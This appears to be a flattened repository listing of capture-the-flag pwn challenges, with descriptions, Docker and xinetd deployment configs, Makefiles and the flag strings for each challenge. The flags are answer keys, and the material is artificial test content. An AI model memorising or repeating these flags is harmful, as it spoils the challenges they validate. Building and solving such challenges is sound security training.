https://raw.githubusercontent.com/jwang-a/CTF/master/utils/Pwn/SECCOMP.h 3 | gcc -Wl,-z,now -fpie -fstack-protector-all grocery_shop.c -o grocery_shop 4 | strip grocery_shop 5 | rm SECCOMP.h 6 | 7 | clean: 8 | rm grocery_shop 9 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Guardian/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | Guardian 3 | 4 | Category : 5 | Pwn, Sandbox 6 | 7 | Desc : 8 | Too much freedom with syscall sentinel last year... 9 | So we hired a new guardian to watch your library usages! 10 | 11 | Estimated Difficulty : 12 | 7/10 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Guardian/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | guardian: 5 | build: . 6 | volumes: 7 | - ./share/:/home/guardian/:ro 8 | - ./init:/init:ro 9 | - ./xinetd:/etc/xinetd.d/guardian:ro 10 | ports: 11 | - "10101:10101" 12 | expose: 13 | - "10101" 14 | privileged: true 15 | restart: always 16 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Guardian/distribute/init: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | dockerd & 4 | sleep 5 #ad-hoc wait for dockerd to initialize 5 | 6 | cd /home/guardian/challenge 7 | docker compose build 8 | 9 | /usr/sbin/xinetd -dontfork 10 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Guardian/distribute/share/challenge/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:22.04@sha256:b4b521bfcec90b11d2869e00fe1f2380c21cbfcd799ee35df8bd7ac09e6f63ea 2 | MAINTAINER James 3 | 4 | RUN apt-get update && apt-get install libc6 -qy 5 | COPY /share/guardian.conf /etc/ld.so.conf.d/guardian.conf 6 | RUN rm /etc/ld.so.cache && ldconfig -N 7 | 8 | CMD ["/bin/bash"] 9 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Guardian/distribute/share/challenge/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | guardian: 5 | build: . 6 | volumes: 7 | - ./share/libguardian.so:/lib/x86_64-linux-gnu/x86_64/libguardian.so:ro 8 | - ./share/ld.so.preload:/etc/ld.so.preload:ro 9 | - ./share/flag:/root/flag:ro 10 | stdin_open: true 11 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Guardian/distribute/share/challenge/share/flag: -------------------------------------------------------------------------------- 1 | BALSN{s3nt1nel_d3fea7ed!_gu4rdian_bypa5sed!_wh4t_sh0uld_I_try_n3xt_y34r?} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Guardian/distribute/share/challenge/share/guardian.conf: -------------------------------------------------------------------------------- 1 | # sandbox 2 | /lib/x86_64-linux-gnu/x86_64 3 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Guardian/distribute/share/challenge/share/ld.so.preload: -------------------------------------------------------------------------------- 1 | /lib/x86_64-linux-gnu/x86_64/libguardian.so 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Guardian/distribute/share/challenge/share/libguardian.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Guardian/distribute/share/challenge/share/libguardian.so -------------------------------------------------------------------------------- /MyChallenges/Pwn/Guardian/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service guardian 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/guardian/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = root 10 | groups = yes 11 | bind = 0.0.0.0 12 | port = 10101 13 | flags = REUSE 14 | } 15 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Guardian/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc -shared -fPIC -fstack-protector-all -Wl,-z,now guardian.c pathlib.c util.c -o libguardian.so 3 | clean: 4 | rm guardian 5 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/HelloWorld/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | Hello World 3 | 4 | Category : 5 | Pwn 6 | 7 | Desc : 8 | A simple AI to greet the customers (chuckles 9 | 10 | Estimated Difficulty : 11 | 3/10 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/HelloWorld/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:19.04 2 | 3 | RUN apt-get update 4 | RUN apt-get dist-upgrade -y 5 | RUN apt-get install socat -y 6 | 7 | COPY libc64_2.29.so /lib/x86_64-linux-gnu/libc-2.29.so 8 | COPY ld64_2.29.so /lib64/ld-linux-x86-64.so.2 9 | 10 | RUN useradd -m hello 11 | COPY helloworld flag /home/hello/ 12 | RUN chown -R root:hello /home/hello 13 | RUN chmod -R 750 /home/hello/ 14 | EXPOSE 4444 15 | USER hello 16 | CMD socat -T30 TCP-LISTEN:4444,reuseaddr,fork EXEC:/home/hello/helloworld 17 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/HelloWorld/flag: -------------------------------------------------------------------------------- 1 | FLAG{the_Ultimate_Guide_to_becoming_a_Computer_Geek} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/HelloWorld/helloworld: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/HelloWorld/helloworld -------------------------------------------------------------------------------- /MyChallenges/Pwn/House_of_Cats/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | House of Cats 3 | 4 | Category : 5 | Pwn 6 | 7 | Desc : 8 | (ΦωΦ) nyan 9 | 10 | Hint : 11 | tcache! 12 | 13 | Note : 14 | consider spinning up a vm instance near our server if network latency is unbearable 15 | 16 | Estimated Difficulty : 17 | 9/10 18 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/House_of_Cats/House_of_Cats.key: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/House_of_Cats/House_of_Cats.key -------------------------------------------------------------------------------- /MyChallenges/Pwn/House_of_Cats/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:focal 2 | MAINTAINER James 3 | 4 | RUN apt-get update 5 | RUN apt-get install xinetd bsdmainutils bc -qy 6 | RUN useradd -m HouseofCats 7 | RUN chown -R root:root /home/HouseofCats 8 | RUN chmod -R 755 /home/HouseofCats 9 | 10 | CMD ["/usr/sbin/xinetd","-dontfork"] 11 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/House_of_Cats/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | houseofcats: 5 | build: . 6 | volumes: 7 | - ./share:/home/HouseofCats:ro 8 | - ./xinetd:/etc/xinetd.d/houseofcats:ro 9 | ports: 10 | - "10104:10101" 11 | expose: 12 | - "10101" 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/House_of_Cats/distribute/share/flag: -------------------------------------------------------------------------------- 1 | BALSN{I_10v3_c47s_h0w_abt_y0u?M30W_ME0W_MEOW_M3OW} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/House_of_Cats/distribute/share/house_of_cats: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/House_of_Cats/distribute/share/house_of_cats -------------------------------------------------------------------------------- /MyChallenges/Pwn/House_of_Cats/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service houseofcats 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/HouseofCats/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = root 10 | port = 10101 11 | flags = REUSE 12 | } 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/House_of_Cats/exploit/exp.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | python3 exp_fast.py 4 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/House_of_Cats/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc -Wl,-z,now -fpie -fstack-protector-all house_of_cats_armoured.c -o house_of_cats 3 | strip house_of_cats 4 | 5 | clean: 6 | rm house_of_cats 7 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/House_of_Cats/sourcecode/development/house_of_cats: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/House_of_Cats/sourcecode/development/house_of_cats -------------------------------------------------------------------------------- /MyChallenges/Pwn/House_of_Cats/sourcecode/development/house_of_cats_armoured: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/House_of_Cats/sourcecode/development/house_of_cats_armoured -------------------------------------------------------------------------------- /MyChallenges/Pwn/House_of_Cats/sourcecode/development/house_of_cats_noprintf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/House_of_Cats/sourcecode/development/house_of_cats_noprintf -------------------------------------------------------------------------------- /MyChallenges/Pwn/Illusion/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | Illusion 3 | 4 | Category : 5 | Pwn, Reverse 6 | 7 | Desc : 8 | A thin veil of texture to fabricate the illusion of pwnable vulnerability 9 | 10 | Estimated Difficulty : 11 | 4/10 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Illusion/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:focal 2 | MAINTAINER James 3 | 4 | RUN apt-get update 5 | RUN apt-get install xinetd -qy 6 | RUN useradd -m Illusion 7 | RUN chown -R root:root /home/Illusion 8 | RUN chmod -R 755 /home/Illusion 9 | 10 | CMD ["/usr/sbin/xinetd","-dontfork"] 11 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Illusion/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | illusion: 5 | build: ./ 6 | volumes: 7 | - ./share:/home/Illusion:ro 8 | - ./xinetd:/etc/xinetd.d/illusion:ro 9 | ports: 10 | - "10104:10101" 11 | expose: 12 | - "10101" 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Illusion/distribute/share/flag: -------------------------------------------------------------------------------- 1 | FLAG{D0kk1ri_T3x7ure} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Illusion/distribute/share/illusion: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Illusion/distribute/share/illusion -------------------------------------------------------------------------------- /MyChallenges/Pwn/Illusion/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 60 /home/Illusion/illusion 5 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Illusion/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service illusion 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/Illusion/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = Illusion 10 | bind = 0.0.0.0 11 | port = 10101 12 | flags = REUSE 13 | } 14 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Illusion/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc -Wl,-z,lazy -fpie -fstack-protector-all -fno-builtin-printf illusion.c -o illusion 3 | python3 illusion.py illusion 4 | 5 | clean: 6 | rm illusion 7 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Oldnote/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | Oldnote 3 | 4 | Category : 5 | Pwn 6 | 7 | Desc : 8 | Old, but gold 9 | 10 | Hint : 11 | Sometimes programmers make exploitable mistakes 12 | Other times they don't, 13 | This is when libraries come to hackers aid 14 | 15 | Estimated Difficulty : 16 | 4/10 17 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Oldnote/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | oldnote: 5 | build: ./ 6 | volumes: 7 | - ./share:/home/Oldnote:ro 8 | - ./xinetd:/etc/xinetd.d/oldnote:ro 9 | ports: 10 | - "10102:10101" 11 | expose: 12 | - "10101" 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Oldnote/distribute/ld-2.26.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Oldnote/distribute/ld-2.26.so -------------------------------------------------------------------------------- /MyChallenges/Pwn/Oldnote/distribute/libc-2.26.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Oldnote/distribute/libc-2.26.so -------------------------------------------------------------------------------- /MyChallenges/Pwn/Oldnote/distribute/share/flag: -------------------------------------------------------------------------------- 1 | flag{g00d_0ld_t1me_wh3n_tc4ch3_1s_571ll_cut3} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Oldnote/distribute/share/oldnote: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Oldnote/distribute/share/oldnote -------------------------------------------------------------------------------- /MyChallenges/Pwn/Oldnote/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 60 /home/Oldnote/oldnote 5 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Oldnote/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service oldnote 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/Oldnote/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = Oldnote 10 | bind = 0.0.0.0 11 | port = 10101 12 | flags = REUSE 13 | } 14 | 15 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Oldnote/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc -Wl,-z,now -fpie -fstack-protector-all oldnote.c -o oldnote 3 | strip oldnote 4 | 5 | clean: 6 | rm oldnote 7 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Robot/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | Robot 3 | 4 | Category : 5 | Pwn 6 | 7 | Desc : 8 | In some parallel Dystopian world, robots are already smarter than humans 9 | 10 | Estimated Difficulty : 11 | 4/10 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Robot/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:disco-20200114 2 | MAINTAINER James 3 | 4 | RUN sed -i -re 's/([a-z]{2}\.)?archive.ubuntu.com|security.ubuntu.com/old-releases.ubuntu.com/g' /etc/apt/sources.list && \ 5 | apt-get update && \ 6 | DEBIAN_FRONTEND=noninteractive apt-get install -qy xinetd 7 | RUN useradd -m robot 8 | RUN chown -R root:root /home/robot 9 | RUN chmod -R 755 /home/robot 10 | 11 | CMD ["/usr/sbin/xinetd","-dontfork"] 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Robot/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | robot: 5 | build: ./ 6 | volumes: 7 | - ./share:/home/robot:ro 8 | - ./xinetd:/etc/xinetd.d/robot:ro 9 | ports: 10 | - "30202:10101" 11 | expose: 12 | - "10101" 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Robot/distribute/share/flag: -------------------------------------------------------------------------------- 1 | FLAG{beep_bo0op_b33p_be3p_boop} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Robot/distribute/share/robot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Robot/distribute/share/robot -------------------------------------------------------------------------------- /MyChallenges/Pwn/Robot/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 60 /home/robot/robot 5 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Robot/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service robot 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/robot/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = robot 10 | port = 10101 11 | flags = REUSE 12 | } 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Robot/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc -z lazy -z noexecstack -fstack-protector robot.c -o robot 3 | strip robot 4 | 5 | clean: 6 | rm robot 7 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/STACK/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | STACK 3 | 4 | Category : 5 | Pwn 6 | 7 | Desc : 8 | Super TAsk traCKer helps you keep track of everyday tasks 9 | 10 | Hint : 11 | tcache! 12 | 13 | Note : 14 | consider spinning up a vm instance near our server if network latency is unbearable 15 | 16 | Estimated Difficulty : 17 | 8/10 18 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/STACK/STACK.key: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/STACK/STACK.key -------------------------------------------------------------------------------- /MyChallenges/Pwn/STACK/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:focal 2 | MAINTAINER James 3 | 4 | RUN apt-get update 5 | RUN apt-get install xinetd -qy 6 | RUN useradd -m STACK 7 | RUN chown -R root:root /home/STACK 8 | RUN chmod -R 755 /home/STACK 9 | 10 | CMD ["/usr/sbin/xinetd","-dontfork"] 11 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/STACK/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | stack: 5 | build: ./ 6 | volumes: 7 | - ./share:/home/STACK:ro 8 | - ./xinetd:/etc/xinetd.d/stack:ro 9 | ports: 10 | - "10103:10101" 11 | expose: 12 | - "10101" 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/STACK/distribute/share/flag: -------------------------------------------------------------------------------- 1 | BALSN{S74ck_bu7_4ctua11y_N0t_5taCk} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/STACK/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 600 /home/STACK/stack 5 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/STACK/distribute/share/stack: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/STACK/distribute/share/stack -------------------------------------------------------------------------------- /MyChallenges/Pwn/STACK/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service stack 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/STACK/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = STACK 10 | bind = 0.0.0.0 11 | port = 10101 12 | flags = REUSE 13 | } 14 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/STACK/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc -Wl,-z,now -fpie -fstack-protector-all STACK_armoured.c -o STACK 3 | strip STACK 4 | 5 | clean: 6 | rm STACK 7 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/STACK/sourcecode/development/STACK: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/STACK/sourcecode/development/STACK -------------------------------------------------------------------------------- /MyChallenges/Pwn/STACK/sourcecode/development/STACK_armoured: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/STACK/sourcecode/development/STACK_armoured -------------------------------------------------------------------------------- /MyChallenges/Pwn/Secret_Keeper2/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | Secret Keeper 3 | 4 | Category : 5 | Pwn 6 | 7 | Desc : 8 | Secret Keeper Inc. 9 | Have You ever thought of sharing your secret with others, but worried about whether they can keep the secret? If the answer is yes, Secret Keeper Inc. is your perfect choice. Share your secret and we will keep it. 10 | 11 | Estimated Difficulty : 12 | 2/10 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Secret_Keeper2/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:19.04 2 | 3 | RUN apt-get update 4 | RUN apt-get dist-upgrade -y 5 | RUN apt-get install socat -y 6 | 7 | COPY libc64_2.29.so /lib/x86_64-linux-gnu/libc-2.29.so 8 | COPY ld64_2.29.so /lib64/ld-linux-x86-64.so.2 9 | 10 | RUN useradd -m secret 11 | COPY secret_keeper flag /home/secret/ 12 | RUN chown -R root:secret /home/secret 13 | RUN chmod -R 750 /home/secret/ 14 | EXPOSE 4444 15 | USER secret 16 | CMD socat -T30 TCP-LISTEN:4444,reuseaddr,fork EXEC:/home/secret/secret_keeper 17 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Secret_Keeper2/flag: -------------------------------------------------------------------------------- 1 | FLAG{https://www.memesmonkey.com/topic/secret#&gid=1&pid=1} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Secret_Keeper2/secret_keeper_v2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Secret_Keeper2/secret_keeper_v2 -------------------------------------------------------------------------------- /MyChallenges/Pwn/Sentinel/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | Sentinel 3 | Sentinel Revenge 4 | 5 | Category : 6 | Pwn, Misc 7 | 8 | Desc : 9 | ------------------------------------------------------- 10 | Here is your shell 11 | But never forget 12 | Sentinel is watching you 13 | ------------------------------------------------------- 14 | You evaded all surveillance by sentinel 15 | Now his big brother is here for revenge 16 | 17 | Estimated Difficulty : 18 | 5/10 19 | 8/10 20 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Sentinel/README.md: -------------------------------------------------------------------------------- 1 | # Sentinel 2 | 3 | Bypass a seemingly invincible sandbox by abusing filesystem quirks 4 | 5 | | | Solves | 6 | | --------- | ------ | 7 | | original | 8/584 | 8 | | revenge | 5/584 | 9 | 10 | ## Making of the Challenge 11 | 12 | TBD 13 | 14 | ## Writeup 15 | 16 | TBD 17 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Sentinel/distribute/.dockerignore: -------------------------------------------------------------------------------- 1 | **/.git 2 | **/.gitignore 3 | **/.DS_Store 4 | **/node_modules 5 | **/Thumbs.db 6 | **/*~ 7 | src/.keep 8 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Sentinel/distribute/challengeBin/sentinel: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Sentinel/distribute/challengeBin/sentinel -------------------------------------------------------------------------------- /MyChallenges/Pwn/Sentinel/distribute/challengeBin/sentinelRevenge: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Sentinel/distribute/challengeBin/sentinelRevenge -------------------------------------------------------------------------------- /MyChallenges/Pwn/Sentinel/distribute/challengeFlag/fakeFlag: -------------------------------------------------------------------------------- 1 | B415N{fake flag} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Sentinel/distribute/challengeFlag/flag: -------------------------------------------------------------------------------- 1 | BALSN{l4y1n6_l0w_5eek1ng_0u7_7he_upp3r_pl4c3s_wh3r3_7h3_in0d3_tr4nsp0s3} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Sentinel/distribute/challengeFlag/flagRevenge: -------------------------------------------------------------------------------- 1 | BALSN{rem3mb3r_m3_70_0n3_wh0_l1v35_th3r3_1t_0nc3_wa5_4_7ru3_cl0n3_0f_m1n3} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Sentinel/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | sentinel: 5 | build: ./ 6 | volumes: 7 | - ./share/:/home/sentinel/:rw 8 | - ./tmp/:/tmp2/:rw 9 | - ./init:/init:ro 10 | - ./xinetd:/etc/xinetd.d/sentinel:ro 11 | ports: 12 | - "10101:10101" 13 | expose: 14 | - "10101" 15 | privileged: true 16 | restart: always 17 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Sentinel/distribute/init: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | mkdir -p /tmp2/dockerRoot 4 | chown -R root:root /home/sentinel 5 | dockerd --data-root=/tmp2/dockerRoot --storage-driver overlay2 & 6 | /usr/sbin/xinetd -dontfork 7 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Sentinel/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | exec timeout 1800 python3 /home/sentinel/instanceManager.py /tmp2/instances/ /home/sentinel/guest_home/ 24 dummySecret 4 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Sentinel/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service sentinel 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/sentinel/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = root 10 | groups = yes 11 | env = HOME=/home/sentinel/ 12 | bind = 0.0.0.0 13 | port = 10101 14 | flags = REUSE 15 | } 16 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Sentinel/exploit/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc -Wl,-z,now -fpie -fstack-protector-all exp.c -o exp 3 | strip exp 4 | 5 | clean: 6 | rm exp 7 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Sentinel/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | original: 2 | gcc -Wl,-z,now -fpie -fstack-protector-all -DDO_LOG sentinel.c -o sentinel 3 | strip sentinel 4 | 5 | revenge: 6 | patch -p0 sentinel.c source.diff -o sentinelRevenge.c 7 | gcc -Wl,-z,now -fpie -fstack-protector-all -DDO_LOG sentinelRevenge.c -o sentinelRevenge 8 | strip sentinelRevenge 9 | rm sentinelRevenge.c 10 | 11 | all: original revenge 12 | 13 | clean: 14 | rm sentinel sentinelRevenge 15 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Survey/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | Survey 3 | 4 | Category : 5 | Pwn 6 | 7 | Desc : 8 | Anything you want to tell us? 9 | 10 | Estimated Difficulty : 11 | 3/10 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Survey/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:disco-20200114 2 | MAINTAINER James 3 | 4 | RUN sed -i -re 's/([a-z]{2}\.)?archive.ubuntu.com|security.ubuntu.com/old-releases.ubuntu.com/g' /etc/apt/sources.list && \ 5 | apt-get update && \ 6 | DEBIAN_FRONTEND=noninteractive apt-get install -qy xinetd 7 | RUN useradd -m survey 8 | RUN chown -R root:root /home/survey 9 | RUN chmod -R 755 /home/survey 10 | 11 | CMD ["/usr/sbin/xinetd","-dontfork"] 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Survey/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | robot: 5 | build: ./ 6 | volumes: 7 | - ./share:/home/survey:ro 8 | - ./xinetd:/etc/xinetd.d/survey:ro 9 | ports: 10 | - "30201:10101" 11 | expose: 12 | - "10101" 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Survey/distribute/share/flag: -------------------------------------------------------------------------------- 1 | FLAG{7h4nks_f0r_y0ur_f33dback} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Survey/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 60 /home/survey/survey 5 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Survey/distribute/share/survey: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Survey/distribute/share/survey -------------------------------------------------------------------------------- /MyChallenges/Pwn/Survey/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service survey 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/survey/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = survey 10 | port = 10101 11 | flags = REUSE 12 | } 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Survey/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc -z now -z noexecstack -fstack-protector survey.c -o survey 3 | strip survey 4 | 5 | clean: 6 | rm survey 7 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/GOTlab/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | GOTlab 3 | 4 | Category : 5 | Pwn 6 | 7 | Desc : 8 | playing with lookup tables 9 | 10 | Estimated Difficulty : 11 | 0/10 12 | -------------------------------------------------------------------------------- 